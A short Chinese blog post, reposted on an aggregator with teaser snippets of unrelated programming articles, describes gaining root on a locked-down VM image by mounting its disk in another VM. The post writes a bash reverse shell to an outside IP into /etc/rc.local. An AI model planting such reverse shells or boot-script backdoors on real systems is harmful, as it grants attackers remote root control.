记一次简单的获取虚拟机|伪终端shell权限

场景描述

某个系统是ova文件,导入虚拟机启动,但是启动后只有一个伪终端权限,即权限很小,如何拿到这个虚拟机的shell权限呢?

实际操作

这次运气比较好,所遇到的系统磁盘并没有被加密,所以直接导入虚拟机后,使用DiskGenius查看生成的vmdk文件,定位到所需要挂载的盘符为/dev/sda1。
所以直接新开启一台linux虚拟机,选择添加硬盘,并选择刚才的vmdk文件:

在这里插入图片描述
进入虚拟机shell后,可以使用lsblk命令查看盘符,然后使用如下命令进行挂载:

mkdir mydisk1
mount /dev/sda1 mydisk1
cd mydisk1

进去后,找到/etc/rc.local文件,将反弹shell命令输入到该文件中

bash -i >& /dev/tcp/10.13.162.20/9999 0>&1 &

然后本机开启监听,成功拿到root权限!
在这里插入图片描述

参考连接

https://badmonkey.site/archives/vm-getshell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/519227.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

请说明Vue中的插槽复用

在前端开发中,Vue是一款广泛应用的JavaScript框架,它提供了丰富的功能和灵活性,使得开发者可以轻松构建交互性强大的Web应用程序。Vue中的插槽(slot)是一项非常有用的功能,能够帮助我们实现组件的复用&…

Redis几大数据类型

使用场景: Redis 数据类型及应用场景https://segmentfault.com/a/1190000012212663 Redis的五种常用数据类型在实际应用中有丰富的使用场景: 字符串(String) 缓存:存储经常查询但不频繁修改的数据,如网页…

FreeRTOS day2

1.使用ADC采样光敏电阻数值,如何根据这个数值调节LED灯亮度。 while (1){/* USER CODE END WHILE *//* USER CODE BEGIN 3 */adc_value HAL_ADC_GetValue(&hadc);TIM3->CCR3 adc_value * 999 / 4095;printf("%d %d\r\n",adc_value,TIM3->C…

【C++】priority_queue和仿函数

priority_queue翻译过来就是优先队列,其实就是我们数据结构中的堆。堆这个东西之前也说过,它分为大根堆和小根堆,它的底层是一个类似数组的连续的空间,逻辑结构是一个完全二叉树,这个完全二叉树如果是小根堆的话父亲小…

Mybatis-Plus——05,乐观锁(新注解)

乐观锁(新注解) 一、数据库添加一个字段二、实体类添加version注解三、注册乐观锁插件四、测试一下4.1成功的乐观锁4.2失败的乐观锁————————创作不易,笔记不易,如觉不错,请三连,谢谢~~ 乐观锁实现方…

哪个品牌骨传导蓝牙耳机好?避免陷阱的终极选购指南

随着智能音频技术的不断进步,蓝牙耳机市场迎来了快速的发展。特别是近年来在运动爱好者中流行的骨传导蓝牙耳机,其以独特的不入耳设计赢得了广泛的欢迎。这种耳机不仅提供了舒适的佩戴体验,还能让用户在享受音乐的同时保持对周围环境的警觉。…

Vue中如何处理组件间的耦合问题?

在Vue中处理组件间的耦合问题是前端开发中常见的挑战之一。耦合问题指的是组件之间的依赖关系过于紧密,一旦某个组件发生改动,则可能导致其它组件也需要作出相应调整。为了解决这个问题,我们可以采取以下几种方法: 使用事件总线&…

Cadence HDL原理图如何备份

首先,在使用Cadence HDL软件时,在绘制完原理图想重新修改的时候,总找不到地方。 请请教完前辈有所了解,故进行记录。(防止遗忘!共同学习~) 第一步: 第二步: 以上。

VisionPro 判断圆是不是无限接近圆或存在缺陷

项目上可能需要判断圆是否是无限接近圆或者判断圆边缘是否存在缺陷等。 第一种方法:找圆工具和点到点的距离计算圆边缘上的点到圆心距离的最大值和最小值的差值。 #region namespace imports using System; using System.Collections; using System.Drawing; usin…

1分钟带你搞定Python函数分类

python语言中,函数可以分为内置函数、自定义函数、有参数函数、无参数函数、有名字函数和匿名函数。其中,内置函数可以直接使用,自定义函数需要根据需求定义。有参数函数在定义时需要指定参数,调用时传入参数。无参数函数在定义时…

通过对话式人工智能打破语言障碍

「AI突破语言障碍」智能人工智能如何让全球交流无障碍 在当今互联的世界中,跨越语言界限进行交流的能力比以往任何时候都更加重要。 对话式人工智能(包括聊天机器人和语音助手等技术)在打破这些语言障碍方面发挥着关键作用。 在这篇博文中&am…

3.7 day2 Free RTOS

使用ADC采样光敏电阻数值,如何根据这个数值调节LED灯亮度。2.总结DMA空闲中断接收数据的使用方法 while (1){/* USER CODE END WHILE *//* USER CODE BEGIN 3 */adc_value HAL_ADC_GetValue(&hadc);TIM3->CCR3 adc_value * 999 / 4095;printf("%d …